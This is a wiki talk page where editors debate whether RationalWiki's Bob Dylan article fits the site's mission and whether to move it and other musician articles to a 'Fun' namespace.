- An IDE for editing Python is recommended.
- Two terminal windows: one for running the Podman service and reviewing debugging information, the second window to run scripts.
- Usage of curl and jq commands are demonstrated.
- You can review connection URLs here.
Getting started
The service
For these examples, we are running the Podman service as a normal user and on an unsecured TCP/IP port number.
For production, the Podman service should use systemd's socket activation protocol. This allows Podman to support clients without additional daemons and secure the access endpoint.
The following command runs the Podman service on port 8080 without timing out. You will need to type ^C into this terminal window when you are finished with the tutorial.
# podman system service tcp:localhost:8080 --log-level=debug --time=0
In addition to the TCP socket demonstrated above, the Podman service supports running under systemd's socket activation protocol and Unix domain sockets (UDS).
[ You might also like: Sneak peek: Podman's new REST API ]
Python code
Info resource
The following shows us information about the Podman service and host:
import json import requests response = requests.get("")
Deep dive
requests.get()calls the requests library to pass the URL to the Podman service using the GET HTTP method.
- The requests library provides helper methods for all the popular HTTP methods. the Podman service invocation above.
/v1.40.0denotes the API version we are using.
/libpoddenotes that we expect the service to provide a
libpod-specific return payload.
- Not using this element causes the server to return a compatible payload.
/infospecifies the resource we are querying.
Interesting to read, but without output, how do we know it worked?
Getting output
Append the lines below, and you can now see the version of Podman running on the host:
response.raise_for_status() info = json.loads(response.text) print(info.version.Version)
raise_for_status()raises an exception if status code is not between 200 and 399.
json.loads()decodes the body of the HTTP response into an object/dictionary.
When executed, the output is:
2.1.0-dev
The following works from the shell:
$ curl -s '' | jq .version.Version "2.1.0-dev"
Listing containers
import json import requests response = requests.get("") response.raise_for_status() ctnrs = json.loads(response.text) for c in ctnrs: print(c.Id)
json.loads() decodes the HTTP body into an array of objects/dictionaries, the program then prints each container Id. For example:
$ curl -s '' | jq .[].Id "81af11ef7188a826cb5883330525e44afea3ae82634980d68e4e9eefc98d6f61"
If the query parameter all=true had not been provided, then only the running containers would have been listed. The resource queries and parameters for the API are documented here.
Something useful
We've looked at a couple of examples, but how about something a little more useful? You have finished developing the next great container, and the script below will remove everything from your local storage. (If you want to save on typing clean_storage.py)
#!/usr/bin/env python import json import requests # Clean up local storage by removing all containers, pods, and images. Any error will # abort the process confirm = input("Really delete all items from storage? [y/N] ") if str(confirm).lower().strip() != 'y': exit(0) # Query for all pods in storage response = requests.get("") response.raise_for_status() pods = json.loads(response.text) # Workaround for if pods is not None: for p in pods: # For each container: delete container and associated volumes response = requests.delete(f"{p['Id']}?force=true") response.raise_for_status() print(f"Removed {len(pods)} pods and associated objects") else: print(f"Removed 0 pods and associated objects") # Query for all containers in storage response = requests.get("") response.raise_for_status() ctnrs = json.loads(response.text) for c in ctnrs: # For each container: delete container and associated volumes print(c.keys()) response = requests.delete(f"{c['Id']}?force=true&v=true") response.raise_for_status() print(f"Removed {len(ctnrs)} containers and associated objects") # Query for all images in storage response = requests.get("") response.raise_for_status() imgs = json.loads(response.text) for i in imgs: # For each image: delete image and any associated containers response = requests.delete(f"{i['Id']}?force=true") response.raise_for_status() print(f"Removed {len(imgs)} images and associated objects")
[ Getting started with containers? Check out this free course. Deploying containerized applications: A technical overview. ]
Summary
I hope you find this helpful. The API documentation provides you with all the resources and required methods. The input and output bodies are included as well as the status codes.
The Podman code is under heavy development and we welcome your input with issues and pull requests on the project's GitHub page. | https://www.redhat.com/sysadmin/podman-python-bash | CC-MAIN-2020-45 | refinedweb | 818 | 51.34 |
You can subscribe to this list here.
Showing
3
results of 3
On 07/05/2011 05:52 PM, peter wrote:
> # It appears Ubuntu is what is being used- at least by some. I se a 9.x
> version is available. Is this the version in use by MH users?
This is the version I'm using on my Sheevas, though I am looking towards
using Debian when I get a chance to figure out how to load it.
> # Assuming LTS versions are only ones to consider, what are the
> ramifications of the fact that Ubuntu is now on 10.x? To put it another
> way, does it create problems to stay 'current' on the plug platform?
The reason 9.x is being used is that there was a change to Ubuntu(?)
and the specific ARM setup is not being used, hence no 10.x for the
Sheeva.
> # Once I transition to plug computer, I would prefer to power computer
> using a scheme that avoids a traditional UPS. I would use use a config
> that looks something like this: Battery charger > Battery >HE DC/DC
> converter(s) > devices that still need to work when power fails. Is
> selecting a dreamplug or D2plug going to make things more complicated
> with regard to the OS? I also see advantage (possibly / till I need
> more channels) of having on board audio. I am also assuming that if no
> drivers are loaded for the display hardware, that that part of the
> chipset will have little or no impact on the power budget - just my
> wallet correct?
This part is very confusing. I suggest you reword it. But I think you are
asking if loading software will increase power usage and the answer is yes.
Also the more devices you hook up the more power is uses.
> # Related question, I see Sheeva has PS available separately
> (replacement I guess). Can the basic Sheeva be supplied with DC easily?
It looks like the DreamPlug has an external power supply so you just
need to match the power requirements. Building power with backup is
just a matter of getting the correct circuits built.
--
Linux Home Automation Neil Cherry ncherry@... Main site My HA Blog
Author of: Linux Smart Homes For Dummies
On Tue, Jul 05, 2011 at 02:37:03AM -0400, peter wrote:
> What should I be using for SVN version that will be fairly stable and
> that dosen't break any of the hardware I plan to use?
> Should I ditch the CM11a and get a 2413U or 2412N now? My CM11a has
> been a bit finicky so I dont want to spend much time on it if I have
> another viable option
A 2413 S or U should do anything a CM11 can do and much more.
Note that the 2412 isn't being sold by smarthome anymore, but the 2413
should work fine.
I would avoid the 2412N, reda the comments:
Also, I do not believe the 2412N works with mh currently.
> Should I be installing MH in /opt/mh or another spot?
Up to you.
I use /var/local/src/misterhouse/mh and have mh be a symlink to the tree I
want to use (mh, mh-insteon, etc...).
> In the short term I need:
> # To be able to control a handful of X-10 devices already on hand and
> installed.
> # Ability to monitor and control via web. This is kind of a given and
> dosen't seem to be an issue ATM.
mh will do this fine. There is a caveat with insteon though, insteon
commmands aren't fire and forget, you have to wait for the ack.
The mh web interface does not deal with that and therefore shows the old
state of the device because the ACK hasn't been received yet (refresh fixes
this).
> # To utilize 1-wire for temp, humidity (have humichrons - hope they are
> supported by now), and possibly some slow I/O - initially to control
I use 1-wire as you know I do not have humichrons, so I can't comment on
them.
Marc
--
"A mouse is a device used to point at the xterm you want to type in" - A.S.R.
Microsoft is to operating systems ....
.... what McDonalds is to gourmet cooking
Since I'm seeing lots of messages about a new release coming out, I thought
I might add my two cents to the wiki, and help out some other unfortunate
soul who tries to get Audrey working with MisterHouse. I know that Audrey
is obsolete, but someone, somewhere has one and I don't want them to have go
thru the same trouble I had setting it up. All the info in this walkthru is
available with a quite bit of searching on google and waybackmachine.org
If you want your Audrey to be useful (as more than a doorstop), you will
have to update its software. This can be done using a CF card, There are
several images available (but they are growing scarce) I recommend MrAudrey
03-3. It is currently available at:
* wget
*
This is NOT a ZIP file !!! This is the actual flash image DO NOT TRY TO
UNZIP
Once you have the image you will need mkcf.c see below for code.
Here are my notes on making a CF for loading a new image, these are based on
a 32MB Sandisk CF, but any can be used if you give mkcf the correct CF
geometry:
*mkcf MrAudrey_03-3.zip new.cf 32112640*
* dd if=new.cf of=/dev/CF count=62720*.
Once you have the firmware updated, configuring MisterHouse to use Audrey is
actually quite trivial. The first step is to edit your mh.private.ini and
add in the Audrey info.
* Audrey_IPs=Kitchen-10.0.1.13*
* Audrey_no_reboot_on_startup=1*
* sound_dir=/opt/misterhouse/sounds*
* sound_dir_common=$Pgm_Root/sounds*
Then go into Common Code Activation under Setup from web interface, from
there enable: audrey_control2.pl and audreyspeak.pl and click "Process
selected files" You should now have a blinkie/talkie Audrey.
Audrey can be quite flaky. Sometimes it unsuspends by itself, sometimes it
won't unsuspend at all, sometimes the web browser hangs, etc. There is no
hardware reset button so make sure you can get to the power cord.
BEGIN mkcf.c
Do whatever you want with this source code. I don't care.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#define DEFAULT_COMPACT_FLASH_FILE_SIZE (62592 * 512)
#define AUDREY_FLASH_SIZE (16 * 1024 * 1024)
#define IMAGE_SIZE_OFFSET (0x1e8fe00)
#define IMAGE_SIGNATURE 'KOJA'
#define IMAGE_TRAILER_SIZE (0x10)
#define IMAGE_FINAL_FILLER_SIZE (0x1f0)
#define IMAGE_EMPTY_SPACE (AUDREY_FLASH_SIZE + IMAGE_TRAILER_SIZE +
IMAGE_FINAL_FILLER_SIZE)
/*
Flash card larger than 1 gigabyte? I doubt user wanted to do that.
I am so sure that I'll disallow it.
*/
#define RIDICULOUSLY_LARGE_NUMBER (1000 * 1024 * 1024)
#define TRUE (1==1)
#define FALSE (!TRUE)
typedef unsigned int uint32;
static uint32 get_file_size(FILE *f)
{
uint32 saved_position = 0;
uint32 file_size = 0;
saved_position = (uint32)ftell(f);
fseek(f, 0, SEEK_END);
file_size = (uint32)ftell(f);
fseek(f, (long)saved_position, SEEK_SET);
return file_size;
}
static char *copy_file_into_memory(char *file_name, uint32 *mem_size)
{
FILE *f = NULL;
char *file_buf = NULL;
*mem_size = 0;
f = fopen(file_name, "rb");
if (NULL != f) {
uint32 file_size = get_file_size(f);
if (file_size > 0 && file_size <= AUDREY_FLASH_SIZE) {
file_buf = (char*)malloc(file_size);
if (NULL != file_buf) {
uint32 bytes_read = 0;
bytes_read = fread(file_buf, 1, file_size, f);
if (bytes_read == file_size) {
fprintf(stderr, "Read file of size %d.\n", bytes_read);
*mem_size = bytes_read;
if (0x01000000 == bytes_read) {
fprintf(stderr, "WARNING: This image will
overwrite the IPL!\n");
fprintf(stderr, "That is OK if your image
contains an IPL, but ");
fprintf(stderr, "it risks destroying the
device permanently.\n");
fprintf(stderr, "Please be careful!\n");
}
if (0x00fc0000 != bytes_read &&
0x01000000 != bytes_read) {
fprintf(stderr, "WARNING: The input image is a
strange size. Be careful!\n");
}
if (bytes_read < 6 ||
!( 0xeb == (unsigned char)file_buf[0] &&
0x4c == (unsigned char)file_buf[1] &&
0x44 == (unsigned char)file_buf[2] &&
0x44 == (unsigned char)file_buf[3] &&
0x44 == (unsigned char)file_buf[4] &&
0x44 == (unsigned char)file_buf[5])) {
fprintf(stderr, "WARNING: The input image does
not appear to begin with a ");
fprintf(stderr, "Neutrino kernel.\nOdds are
high that your Audrey will stop ");
fprintf(stderr, "working if you flash this
image to it.\n");
}
} else {
fprintf(stderr, "Expected %d bytes but got %d instead.\n",
file_size,
bytes_read);
free(file_buf);
file_buf = NULL;
}
} else {
fprintf(stderr, "Couldn't allocate %d bytes.\n", file_size);
}
} else {
fprintf(stderr, "File was a weird size: %d.\n", file_size);
}
fclose(f);
} else {
fprintf(stderr, "Couldn't load file '%s.'\n", file_name);
}
return file_buf;
}
static uint32 compute_checksum(char *file_buf, uint32 file_size)
{
uint32 checksum = 0;
uint32 *p = (uint32 *)file_buf;
while (file_size != 0) {
checksum += *p++;
file_size -= sizeof(uint32);
}
return checksum;
}
static void serialize_uint32(uint32 n, FILE *f)
{
char c = '\0';
c = (char)(n);
fwrite(&c, 1, 1, f);
c = (char)(n >> 8);
fwrite(&c, 1, 1, f);
c = (char)(n >> 16);
fwrite(&c, 1, 1, f);
c = (char)(n >> 24);
fwrite(&c, 1, 1, f);
}
static void fill_empty(uint32 count, int is_flash, FILE *f)
{
char c = 0;
if (is_flash) {
c = (char)(0xff);
}
while (0 != count--) {
fwrite(&c, 1, 1, f);
}
}
static void print_help(void)
{
fprintf(stderr, "usage: mkcf afs_file_name afs_output_file_name "
"[flash_file_size default=%d]\n",
DEFAULT_COMPACT_FLASH_FILE_SIZE);
}
int main(int argc, char* argv[])
{
char *ifn = NULL, *ofn = NULL;
uint32 of_size = DEFAULT_COMPACT_FLASH_FILE_SIZE;
int result = 1;
char *file_buf = NULL;
uint32 file_size = 0;
if (1 == argc) {
print_help();
return 0;
}
if (argc > 1) {
if (0 == strcmp(argv[1], "-h") ||
0 == strncmp(argv[1], "--h", 3)) {
print_help();
return 0;
}
}
if (argc < 3) {
fprintf(stderr, "Missing arguments.\n");
print_help();
return 1;
}
ifn = argv[1];
ofn = argv[2];
if (argc >= 4) {
of_size = atoi(argv[3]);
if (0 == of_size || of_size > RIDICULOUSLY_LARGE_NUMBER) {
fprintf(stderr, "Requested output file size was unreasonable.\n");
return 1;
}
}
file_buf = copy_file_into_memory(argv[1], &file_size);
if (NULL != file_buf) {
FILE *out = NULL;
uint32 checksum = 0;
checksum = compute_checksum(file_buf, file_size);
fprintf(stderr, "File checksum is %8x.\n", checksum);
out = fopen(argv[2], "wb");
if (NULL != out) {
fprintf(stderr, "Creating output file '%s' of size %d...",
argv[2],
of_size);
fwrite(file_buf, 1, file_size, out);
fill_empty(AUDREY_FLASH_SIZE - file_size, TRUE, out);
fill_empty(of_size - IMAGE_EMPTY_SPACE, FALSE, out);
serialize_uint32(file_size, out);
serialize_uint32(0, out);
serialize_uint32(IMAGE_SIGNATURE, out);
serialize_uint32(checksum, out);
fill_empty(IMAGE_FINAL_FILLER_SIZE, FALSE, out);
fclose(out);
fprintf(stderr, "done!\n");
result = 0;
} else {
fprintf(stderr, "Couldn't open output file %s.\n", argv[2]);
}
free(file_buf);
}
return result;
}
END mkcf.c
--
Raleigh Apple
twitch@... | http://sourceforge.net/p/misterhouse/mailman/misterhouse-users/?viewmonth=201107&viewday=6 | CC-MAIN-2014-41 | refinedweb | 1,704 | 64.1 |
...
Here is a pop quiz for language aficionados.
Examine the following class:
public
class Foo
{
public
...
The skill of writing is to create
a context in which other people can think.
-- Edwin Schlossberg
Jeff Atwood presents a visual
contrast of two WPF books in "How Not To Write A
Technical Book". I haven't read either WPF book, but Jeff's post did provoke some
thinking…
Color Me Code...
Your...
MSDN says the List.ForEach method will "perform the specified action on each element of the List".
The following program does print out a haiku to the console, but does not make the haiku all lowercase.
using System;
using System.Collections.Generic;
class WWWTC
{
static void Main()
{
List<string> haiku = new List<string>();
haiku.Add("All software changes");
haiku.Add("Upon further reflection -");
haiku.Add("A reference to String");
// make it lowercase
haiku.ForEach(
delegate(string s)
{
s = s.ToLower();
}
);
// ... and now print it out
haiku.ForEach(
delegate(string s)
{
Console.WriteLine(s);
}
);
}
}
What's wrong?
J...
D...
My:
Every JavaScript function is an object.
Every JavaScript function has an execution context.
I think these concepts are keys to understanding modern JavaScript libraries. I hope that driving home these
two concepts will let a developer understand what the following code is doing,...
The......
Subscribe in a reader
(c) 2003-2009 OdeToCode LLC
K. Scott Allen
This theme is missing your touch... | http://odetocode.com/blogs/scott/archive/2007/04.aspx | crawl-003 | refinedweb | 231 | 70.7 |
Intro by Niko Laskaris
We recently released a code-based custom visualization builder called Custom Panels. As part of the rollout, we’re featuring user stories from some of the awesome Researchers using Comet as part of their R&D toolkit. One of these teams, Pento.ai, are long-time Comet users and were part of the beta test group for Custom Panels. Pento is a top machine learning consulting firm working with some of the biggest companies in the world. We were excited to see what they’d come up with given the freedom to build any visualization they wanted, and we weren’t disappointed.
Comet Custom Panels at Pento.ai
Written by Pablo Soto and Agustin Azzinnari
Pento is a company specializing in building software solutions that leverage the power of machine learning. By incorporating data and learning into our clients’ processes, we help them make optimal decisions or even automate entire processes.
There are many consulting companies out there all with a similar offering so, since the beginning, we’ve tried to take a novel approach. Pento is composed of a group of partners that have ample experience in the industry, delivering solutions with real and measurable results.
Having this autonomy allows us to cover a lot of ground while being highly specialized: we are partners with a proven track record in computer vision, in predictive analytics, as well as natural language processing. We’ve also been able to let this focus spill over to the open source community we leverage so much from, by contributing with tools such as our human perception library, Terran.
In the market today, Machine learning is a highly sought-after skill. Many companies are popping up left and right to fill this gap left by the new advances in the area. However, not every ML project goes according to plan. There are many, many aspects one needs to balance at the same time.
As such, ML engineers need to make use of all the tools at hand to ensure this process goes smoothly. We’ve found Comet, in particular, to be one of the tools that have permanently found a place in our toolbox.
Being organized and clear when delivering results is one of the key points to a successful ML initiative. If the series of steps one takes in order to make an automated decision isn’t clear, or simply if the client doesn’t understand the results presented, the project is bound to fail.
Due to this, it’s crucial to keep track of all your experiments, to understand and preserve a record of all of your research over the course of a project. If these experiments take hours or even days to run, we’ll forget why we ran them in the first place. Here’s where we’ve found tools such as Comet to be extremely useful: centralize data for all experiments, attach all the metadata we need to them, visualize intermediate results, and be able to quickly reproduce them.
Working with one client after another, we end up re-using the same visualizations and analytical tools over and over, leveraging the experience acquired in one project for the next one. Given that machine learning is an incremental process, we are constantly tweaking our code and systems and carrying them over to our next project. The Custom Panels feature in Comet is a step towards perfecting that re-usability.
Good visualizations are key to any successful ML project, but this is especially true for Computer Vision (CV) projects. In the following section, we will present a simple CV project, and explore how we can use Comet to improve our experimentation process. We’ll be using our open-source human perception library, called Terran, in order to illustrate the process we’d normally do in a real project.
What’s Terran?
Terran is a human perception library that provides computer vision techniques and algorithms in order to facilitate building systems that interact with people. Whether it’s recognizing somebody by their face, or detecting when they raise their hand, Terran provides the primitives necessary to act in response to a person.
Building a panel
The example project will consist of a simple program that detects faces in a video. In order to do this, we’ll be using three key functionalities from Terran: face detection, recognition and tracking. We’ll implement a custom visualization that’ll help us understand how our program is performing. A common technique to do this is to plot the face embeddings generated by Terran as points on a plane to see if these points are reasonably structured.
For instance, we might train an image classifier, embed these internal representations into a 2-dimensional space, and check that images of the same classes are embedded in nearby regions of this resulting space. If this assumption doesn’t hold, it’s possible our samples are under-represented or even mislabeled, or that there’s an issue with our classifier, so it’s a good thing to check every once in a while.
In our example, we are going to generate the proposed embedding visualizations using the results of our face detection and recognition, and then make sure that faces corresponding to the same person are indeed placed nearby. Here is the video we’ll be using:
First, let’s go with the traditional, fully Python, approach:
We perform face detection and feature extraction on each frame of the video using Terran, which is as simple as using the face_tracking and extract_features functions. By feature extraction we mean retrieving a 1024-dimensional representation for each face, where faces that are similar (and thus probably correspond to the same person) have a small cosine distance between them.
from terran.io import open_video from terran.face import Detection, extract_features from terran.tracking import face_tracking
video = open_video( '', batch_size=64 )
tracker = face_tracking( video=video, detector=Detection(short_side=832), )
faces = []
features = []
for frames in video:
faces_per_frame = tracker(frames)
features_per_frame = extract_features(frames, faces_per_frame)
for frame, frame_faces, frame_features in zip( frames, faces_per_frame, features_per_frame ): for face, feature in zip(frame_faces, frame_features): face_crop = crop_expanded_pad( frame, face['bbox'], factor=0.0 ) faces.append(face_crop) features.append(feature)
Perform dimensionality reduction over these representations by using t-SNE:
from sklearn.manifold import TSNE reduced = TSNE( n_components=2, perplexity=20.0, n_iter=5000, metric='cosine', n_jobs=-1 ).fit_transform(embeddings)
And finally, use the TSNE results to get closest neighbors to each points:
from scipy.spatial.distance import cdist
k = 5 d = cdist(reduced, reduced) neighbors = d.argsort(axis=1)[:, 1: k+1]
Even though Python visualizations can be helpful, they are still static, which makes it difficult to navigate through the results without re-running it each time with different values. Even more, it’s really hard to keep track of the visualizations for each experiment, especially if we have to manually generate them on every run. All of this makes the experimentation process slow and error-prone.
Fortunately, Comet has found a solution for this with Panels. By providing a flexible interface they allow us to create custom interactive visualizations that integrate seamlessly with the rest of Comet’s features, such as asset logging and experiment comparisons.
Extending our example above to use Comet’s Panels is really simple. The following diagram shows how everything fits together. So far we have implemented the blue and green boxes. Now we need to implement the Comet integration (orange).
The first thing we need to do is to upload all the data required by the visualizations. In our case, it means uploading the face crops from step 2 and the face embeddings from step 4 (that is, the 2-dimensional embeddings, so we use up less storage).
We’ll do this from within our Python training code, following the usual steps we go through when using Comet:
1. We first create the experiment:
experiment = Experiment(‘API-KEY’)
2. Then log the necessary assets. First the face crops:
for face_name, face in enumerate(faces): experiment.log_image(face, name=face_name)
3. Then the embeddings and the pre-calculated neighbors data
data = dict(
x=reduced[:, 0].tolist(),
y=reduced[:, 1].tolist(),
faces=[f'#{face_id}' for face_id in range(len(faces))],
neighbors=neighbors.tolist()
) experiment.log_asset_data(data, name='tsne.json')
Now that we have the data available in Comet, we need to build the Panel. The basic interface to be implemented by our Panel is the following:
class MyPanel extends Comet.Panel {
setup() {
// Configuration.
}
draw(experimentKeys, projectId) {
// Select experiment.
this.drawOne(selectedExperimentKey);
}
drawOne(experimentKey) {
// Create and initialize the chart.
}
}
The
setup method is a good place to define all the configurations for your panel. In our case we defined some options for our Plotly chart:
setup() {
this.options = {
layout: {
showlegend: false,
legend: {
orientation: "h"
},
title: {
text: "Embeddings TSNE"
}
}
};
}
Our Panel only works to visualize data from a single experiment, therefore we need to apply the approach described here. For the
draw method, we select the experiment we want to explore, while in the
drawOne method, we create the actual plot. In order to build the plot, we need to fetch the data we uploaded to Comet by using the Javascript SDK:
drawOne(experimentKey) {
// Instantiate Plotly chart.
// Fetch face images.
this.api.experimentImages(experimentKey)
.then(images => {
// Fetch tSNE coordinates and nearest neighbors data.
this.api.experimentAssetByName(experimentKey, "tsne.json")
.then(result => {
// Draw points in chart.
});
});
}
Once we have the data we need in the panel, we can make use of all the Javascript, HTML and CSS ecosystem to create our custom visualization.
To view our custom panel, check out our public Comet project here.
Conclusion
Machine learning is a new addition to software engineering. A whole new set of difficulties and possibilities arise. However, just like the software industry was still searching for ways to tackle projects in a more principled manner at the end of the last century, so as to make the whole process less uncertain, it is now searching for better ways to incorporate ML into the development process.
Part of this evolution is done by making practices more robust and reproducible, and tools such as CometML are contributing towards that goal. As practitioners, we very much welcome such initiatives. | https://www.comet.ml/site/pentoai-panels-for-computer-vision/ | CC-MAIN-2020-40 | refinedweb | 1,698 | 53.21 |
Odoo Help
This community is for beginners and experts willing to share their Odoo knowledge. It's not a forum to discuss ideas, but a knowledge base of questions and their answers.
oerplib not working to connect with SAAS instance
Hi, I am trying to connect to SAAS instance using oerplib, with following commands, but it's throwing an error:
import oerplib
oerp = oerplib.OERP('hostname', protocol='xmlrpc+ssl', port=443, version='9.0c')
oerp.login('username', 'password', database='flyv')
Error:
Can anyone please help me, where us a magnifying glass? :-)
The error is clear...
The XML is pos_debt_notebook.debt_account is not found in the system...
Maybe you can try to update your module 'pos_debt_notebook'
That is a call from pos_bizzcloud who try to access this xmlid
Thanks guys. Got it fixed. pos_debt_notebook module was having some issue at remote side. | https://www.odoo.com/forum/help-1/question/oerplib-not-working-to-connect-with-saas-instance-106223 | CC-MAIN-2016-50 | refinedweb | 141 | 68.16 |
NAME¶
random, urandom - kernel random number source devices
SYNOPSIS¶
#include <linux/random.h>
int ioctl(fd, RNDrequest, param);
DESCRIPTION¶.
Since Linux 3.16, a read(2) from /dev/urandom will return at most 32 MB. A read(2) from /dev/random will return at most 512 bytes (340 bytes on Linux kernels before version 2.6.12).
Writing to /dev/random or /dev/urandom will update the entropy pool with the data written, but this will not result in a higher entropy count. This means that it will impact the contents read from both files, but it will not make reads from /dev/random faster.
Usage¶.¶
If your system does not have /dev/random and /dev/urandom created already, they can be created with the following commands:
mknod -m 666 /dev/random c 1 8 mknod -m 666 ] && interfaces¶) interface¶
The following ioctl(2) requests are defined on file descriptors connected to either /dev/random or /dev/urandom. All requests performed will interact with the input entropy pool impacting both /dev/random and /dev/urandom. The CAP_SYS_ADMIN capability is required for all requests except RNDGETENTCNT.
- RNDGETENTCNT
- Retrieve the entropy count of the input pool, the contents will be the same as the entropy_avail file under proc. The result will be stored in the int pointed to by the argument.
- RNDADDTOENTCNT
- Increment or decrement the entropy count of the input pool by the value pointed to by the argument.
- RNDGETPOOL
- Removed in Linux 2.6.9.
- RNDADDENTROPY
- Add some additional entropy to the input pool, incrementing the entropy count. This differs from writing to /dev/random or /dev/urandom, which only adds some data but does not increment the entropy count. The following structure is used:
struct rand_pool_info {
int entropy_count;
int buf_size;
__u32 buf[0]; };
- Here entropy_count is the value added to (or subtracted from) the entropy count, and buf is the buffer of size buf_size which gets added to the entropy pool.
- RNDZAPENTCNT, RNDCLEARPOOL
- Zero the entropy count of all pools and add some system data (such as wall clock) to the pools.
FILES¶
/dev/random
/dev/urandom
NOTES¶
For an overview and comparison of the various interfaces that can be used to obtain randomness, see random(7).
BUGS¶
During early boot time, reads from /dev/urandom may return data prior to the entropy pool being initialized.
SEE ALSO¶
mknod(1), getrandom(2), random(7)
RFC 1750, "Randomness Recommendations for Security"
COLOPHON¶
This page is part of release 5.10 of the Linux man-pages project. A description of the project, information about reporting bugs, and the latest version of this page, can be found at. | https://dyn.manpages.debian.org/testing/manpages/urandom.4.en.html | CC-MAIN-2021-49 | refinedweb | 436 | 53.81 |
On Thu, Mar 03, 2011 at 10:46:23PM -0600, Ron Johnson wrote: > I have the dusty book "Teach Yourself C++ 4th Ed" by Al Stevens, > from... 1995 and wonder that if I go thru it will I screw myself up > because of new language features. You will certainly find it confusing. Most, if not all, code examples will fail to compile, and you will be learning the wrong way to do things. C++ was not standardised (both language and standard library) until 1999. This book is pre-standardisation. The main issue you'll run into is that the headers were all renamed, and namespaces were introduced. For example: #include <iostream.h> int main () { cout << "Hello world" << endl; } is now #include <iostream> int main () { std::cout << "Hello world" << std::endl; } (You can use "using std::cout;" to remove the need to use std:: every time.) But these are the most superficial differences. You would be able to use the book and make those corrections as you go through. But you would miss out entirely on newer features, most of which you'll probably want to use (even if you don't realise this at the start): references, namespaces, templates are good examples. But this is just the beginning. The main power of C++ comes though its standard library, especially its containers and algorithms. And then there's Boost, which is like the standard library, but better, with the kitchen sink, and on steroids. And perhaps even more importantly, the features are just features; the most important things to learn are the design skills and idioms which will make your code both efficient and robust. I found this invaluable: In particular has some useful recommended texts. Being a learning by example person, I found the "official" Stroustrup text dry and uninspiring, unreadable even. I've heard good things about Koenig and Moo's Accelerated C++. I used "Practical C++ Programming" (O'Reilly) which covers the ISO standard C++, but isn't that amazing, and "Teach yourself C++ for Linux in 21 days" (SAMS), which is old pre-Standard but comes with lots of examples. Both only cover the core language, not the standard library except superficially. I bought a copy of Josuttis' The C++ Standard Library, which is an excellent guide and reference, but it does require learning the language first. Also, for later: Debian got the latest version in unstable just this week. If you would like to see some examples of modern C++, you could take a look at schroot. "apt-get source schroot", or have a browse around here:;a=tree;f=sbuild; This makes use of - templated exceptions - templated containers (map, list, vector) - some inheritance (mainly containment and delegation) - TR1/Boost smartpointers (shared_ptr, weak_ptr) for automatic reference-counted memory management, and tuples - Boost.Regex regular expressions - Boost.Program_options options parsing - Boost.Iostreams file descriptor streams to mix streams with basic systems programming and file locking [standard iostreams don't allow you to create a stream from a file descriptor, let along to locking etc.] - Boost.Filesystem for convenient filesystem functions (creating paths recursively etc.) It also includes a whole bunch of other stuff such as splitting strings into lists of strings and vice-versa (like perl split and join). If there's one thing I'd recommend learning to use, it's std::tr1::shared_ptr (boost::shared_ptr) from C++03. This gives you completely automatic reference-counted memory management. Whereas in C or old-style C++, you would do foo *alloc = malloc(sizeof(foo)); foo *alloc = new foo(); with shared_ptr you do this: std::tr1::shared_ptr<foo> alloc(new foo()); The advantage is that the former two require a manual free() or delete. The shared_ptr will free the memory when its destructor is run (when it goes out of scope). This is much easier to get correct that manual management, and is exception-safe. This means that in practice, you'll never see a "raw" pointer in good C++. One of the key things C++ allows that isn't in most of the books are idioms such as RAII (resource acquisition is initialisation), of which smartpointers are one example. Regards, Roger -- .''`. Roger Leigh : :' : Debian GNU/Linux `. `' Printing on GNU/Linux? `- GPG Public Key: 0x25BFB848 Please GPG sign your mail.
Attachment:
signature.asc
Description: Digital signature | https://lists.debian.org/debian-user/2011/03/msg00333.html | CC-MAIN-2015-32 | refinedweb | 718 | 63.39 |
Talk:Bob Dylan
Please don't fuck with The Bard. He's good as goats.--PalMD-Goatspeed! 12:41, 30 July 2007 (CDT)
- Agreed. There must be a limit somewhere. --AKjeldsenGodspeed! 14:11, 30 July 2007 (CDT)
Contents
mission doubt[edit]
Why do we need an article on this creep with green teeth? Sprocket J Cogswell (talk) 05:50, 30 December 2010 (UTC)
- Yes we could ask the same question of many of our musician articles. What happens is that someone writes about their favorite musician with some tangential reference to the mission. The existence of that article then becomes the justification for the next musician article and so on. But to answer your question I'm not sure why we have this article.--BobSpring is sprung! 09:32, 30 December 2010 (UTC)
- While I concur that this article does seem off mission, I must ask: What the fuck is wrong with Bob Dylan? I love this man. But, yeah, that article isn't really on-mission. The Goonie Punk Can't sleep, clowns will eat me! 16:13, 30 December 2010 (UTC)
- There is nothing whatsoever wrong with him in my opinion. The only question is why there should be an article about him here.--BobSpring is sprung! 16:52, 30 December 2010 (UTC)
- No, but if we delete it, I think the comment should read "With all due respect to the man, of course. Lord of the Goons The official spikey-haired skeptical punk 16:54, 30 December 2010 (UTC)
- Bob Dylan is awesome, and while this article is not really on-mission, why is it worthy of deletion? And if it really is that bothersome due to being off-mission, we could move it to the "Fun" namespace.--Colonel Sanders (talk) 17:02, 30 December 2010 (UTC)
- Fun space sounds good to me. Lord of the Goons The official spikey-haired skeptical punk 17:03, 30 December 2010 (UTC)
- All concur? If so, I'm moving it.--Colonel Sanders (talk) 17:05, 30 December 2010 (UTC)
- (EC)It might be a good idea to have a look at the musicians category before singling out Mr Dylan for exile. Personally I think most of then should be in fun, but you never know what sort of HCM might be involved when dealing with peoples' favourite musicians.--BobSpring is sprung! 17:08, 30 December 2010 (UTC)
- I will do that now. I would never single out Bob Dylan. I will probably have to move most of the musician articles to the fun space, like Elvis Presley.--Colonel Sanders (talk) 17:11, 30 December 2010 (UTC)
Respect is something that needs to be earned and maintained. I'd have thought that notion was at the core of the RW mission.
At one time I could get through the slightly crooked structure of Mr. Tambourine Man without stumbling, and was fond of listening to his other singing. I remember a fair amount of the sixties.
Mr. Zimmerman was human like the rest of us. For all his celebrity, he showed up with muddy feet once in a while, and I will not worship at them. Though I have no citation to provide, by some accounts he was not the kind of person I would want to spend time with. The times they were a-changing, and times have moved past that guy. I suppose you may call it "fun" if you like, but to me the article looks like a wall of unfun text. Sprocket J Cogswell (talk) 18:27, 30 December 2010 (UTC)
All right[edit]
Before I mass move musician articles, any comments?--Colonel Sanders (talk) 17:13, 30 December 2010 (UTC)
I'm not adept at posting on talk-boards with software like this, so I'm not confident this will be able to be read by those to whom I'm responding...but here goes:
Apparently, a bunch of ya'll herein think my bumping up of someone's earlier sketch into a full-blown mini-bio of Dylan is at odds with the rationality theme of RationalWiki. Is that a fair summation of your collective position?
